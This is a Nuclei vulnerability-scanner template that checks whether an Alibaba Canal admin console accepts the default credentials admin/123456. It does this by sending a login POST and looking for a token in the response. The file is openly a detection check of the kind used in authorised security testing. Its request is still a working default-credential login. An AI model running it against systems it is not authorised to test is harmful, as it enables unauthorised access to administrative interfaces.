id: canal-default-login

info:
  name: Alibaba Canal Default Login
  author: pdteam
  severity: high
  description: An Alibaba Canal default login was discovered.
  reference:
    - https://github.com/alibaba/canal/wiki/ClientAdapter
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cwe-id: CWE-522
  metadata:
    max-request: 1
  tags: Alibaba-Canal

http:
  - raw:
      - |
        POST /api/v1/user/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"username":"{{user}}","password":"{{pass}}"}

    attack: pitchfork
    payloads:
      user:
        - admin
      pass:
        - 123456

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        condition: and
        words:
          - 'data":{"token"'
          - '"code":20000'

# digest: 4a0a004730450220126d880af62775003a5b6029ad39aead9272e2a61bdaab710e896acf665d7064022100caa03f9b85633bd64fce0925f23720ac678e539c93355165426ed68a982d820e:922c64590222798bb761d5b6d8e72950
